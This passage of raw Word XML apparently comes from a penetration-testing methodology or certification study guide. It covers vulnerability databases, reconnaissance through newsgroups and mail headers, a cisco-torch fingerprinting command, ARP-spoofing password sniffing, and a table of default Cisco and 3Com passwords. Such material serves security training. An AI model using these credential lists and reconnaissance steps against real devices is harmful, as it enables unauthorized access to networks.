        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mailing list (</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="00761B11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://seclists.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00761B11">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SecurityFocus </w:t>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00761B11" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.securityfocus.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00761B11">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packetstorm </w:t>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00761B11" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.packetstormsecurity.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00761B11" w:rsidRDefault="00761B11" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CERT vulnerability databse</w:t>
      </w:r>
      <w:r w:rsidR="00EB26B7" w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB26B7" w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.kb.cert.org/vuls/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>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MITRE Corperation CVE </w:t>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="00761B11" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://cve.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ISS X-force </w:t>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="00761B11" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://xforce.iss.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761B11" w:rsidRDefault="00761B11" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secunia Advisories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://secunia.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00761B11" w:rsidRDefault="00761B11" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MilW0rm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.milw0rm.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EB26B7" w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>NNTP Newsgroups and Mailing Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C5a- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>Searching newsgroups or mailing lists for us</w:t>
      </w:r>
      <w:r>
        <w:t>eful information about a target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00847E8D" w:rsidRDefault="00761B11" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internet newsgroup searches hold similar types of information as web searches. For example searching newsgroups can reveal usernames, machine names, accessible public servers, etc. Sometimes employees even post news or questions about new systems in use or problems with fixing particular vulnerabilities that may exist on the companies system. This information could reveal valuable attack information or increase the knowledge available for social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF5812" w:rsidRPr="00847E8D" w:rsidRDefault="00BF5812" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF5812" w:rsidRPr="00847E8D" w:rsidRDefault="00BF5812" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Popular news groups and mailing lists to search include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847E8D" w:rsidRPr="00847E8D" w:rsidRDefault="00A944D8" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usenet</w:t>
      </w:r>
      <w:r w:rsidR="00847E8D" w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00847E8D" w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">best ones are </w:t>
      </w:r>
      <w:r w:rsidR="00847E8D" w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mostly pay services although there are lots of </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A944D8" w:rsidRPr="00847E8D" w:rsidRDefault="00847E8D" w:rsidP="00847E8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> services too e.g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00A944D8" w:rsidRPr="00847E8D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>news://nntp.aioe.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00A944D8" w:rsidRPr="00847E8D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>news://news.grc.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A944D8" w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, etc)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF5812" w:rsidRDefault="00BF5812" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>google groups</w:t>
      </w:r>
      <w:r w:rsidR="00847E8D" w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00847E8D" w:rsidRPr="00847E8D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(web based newsgroup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847E8D" w:rsidRPr="00847E8D" w:rsidRDefault="00847E8D" w:rsidP="00847E8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C6 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>Information Leakage from Mail &amp; News headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="0017161E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C6a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>Analysing news group and e-mail headers to ident</w:t>
      </w:r>
      <w:r>
        <w:t>ify internal system information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="0017161E" w:rsidRDefault="0017161E" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017161E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail and newsgroup header can reveal information about the user’s client software and mail/news systems relays that messages to the destination. The client software in use can identify vulnerabilities that may exist within that particular version of software. Mail/news relay information can disclose information about an organisations internal systems and networks, such as the server software versions and internal network topologies from IP addresses, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46">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4D72" w:rsidRDefault="009B4D72" w:rsidP="009B4D72">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="009B4D72">
        <w:lastRenderedPageBreak/>
        <w:t>Networking Equipment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4D72" w:rsidRDefault="009B4D7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9B4D72" w:rsidRPr="005F25BF" w:rsidTr="000336A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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D1</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Management Protocols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Weaknesses in the protocols commonly used for the remote management of devices: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Telnet</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Web based protocols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SSH</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SNMP (covering network information enumeration and common attacks against Cisco configurations)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TFTP</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Cisco Reverse Telnet</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NTP</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8434F5"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D2</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Network Traffic Analysis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Techniques for local network traffic analysis.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Analysis of network traffic stored in PCAP files.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D3</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Networking Protocols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Security issues relating to the networking protocols:</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ARP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DHCP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CDP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HSRP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VRRP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VTP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STP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TACACS+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889" w:type="dxa"/>
          </w:tcPr>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LP</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D4</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IPSec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009B4D72" w:rsidRDefault="009B4D72" w:rsidP="000336A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IPSec services.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D5</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VoIP</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VoIP services.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsid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Knowledge of the SIP protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889" w:type="dxa"/>
          </w:tcPr>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D6</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Wireless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Wireless (802.11) services.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Knowledge of various options for encryption and authentication, and the relative methods of each.</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WEP</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TKIP</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WPA/WPA2</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EAP/LEAP/PEAP</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D7</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sidRPr="009B4D72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Configuration Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009B4D72" w:rsidRPr="009B4D72" w:rsidRDefault="009B4D72" w:rsidP="009B4D72">
            <w:p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Analysing configuration files from the following types of Cisco equipment:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72" w:rsidRPr="009B4D72" w:rsidRDefault="009B4D72" w:rsidP="009B4D72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:num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Routers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72" w:rsidRPr="009B4D72" w:rsidRDefault="009B4D72" w:rsidP="009B4D72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:num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Switches</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4D72" w:rsidRDefault="009B4D72" w:rsidP="009B4D72">
            <w:p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Interpreting the configuration of other manufacturers’ devices.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9B4D72" w:rsidRDefault="009B4D72" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>D1 - Management Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00123C59" w:rsidRDefault="00B50C46" w:rsidP="00123C59">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>Weaknesses in the protocols commonly used for the remote management of devices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00123C59" w:rsidRPr="00123C59" w:rsidRDefault="00123C59" w:rsidP="00123C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00123C59">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fingerprint cisco devices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00123C59" w:rsidRPr="00A236AF" w:rsidRDefault="00AA703A" w:rsidP="00A236AF">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c</w:t>
      </w:r>
      <w:r w:rsidR="00123C59" w:rsidRPr="00123C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>isco-torch.pl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00123C59" w:rsidRPr="00123C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –A &lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00123C59" w:rsidRPr="00123C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00123C59" w:rsidRPr="00123C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>fingerprint services on cisco devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417FC1" w:rsidRPr="00956636" w:rsidRDefault="00417FC1" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956636">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Clear text vulnerable to password sniffing</w:t>
      </w:r>
      <w:r w:rsidR="00AD67C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD67C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD67C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Arp spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55DF7" w:rsidRDefault="00A55DF7" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00417FC1" w:rsidRPr="00956636" w:rsidRDefault="00956636" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956636">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Default passwords: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Cisco</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7858" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956636" w:rsidRPr="00956636" w:rsidRDefault="00956636" w:rsidP="00417FC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00956636">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cisco  c  !cisco  enable  system  admin  router </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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3Com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7858" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956636" w:rsidRPr="00956636" w:rsidRDefault="00956636" w:rsidP="00417FC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00956636">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>admin  adm  tech  synet  manager  monitor  debug  security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Bay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7858" w:type="dxa"/>
          </w:tcPr>
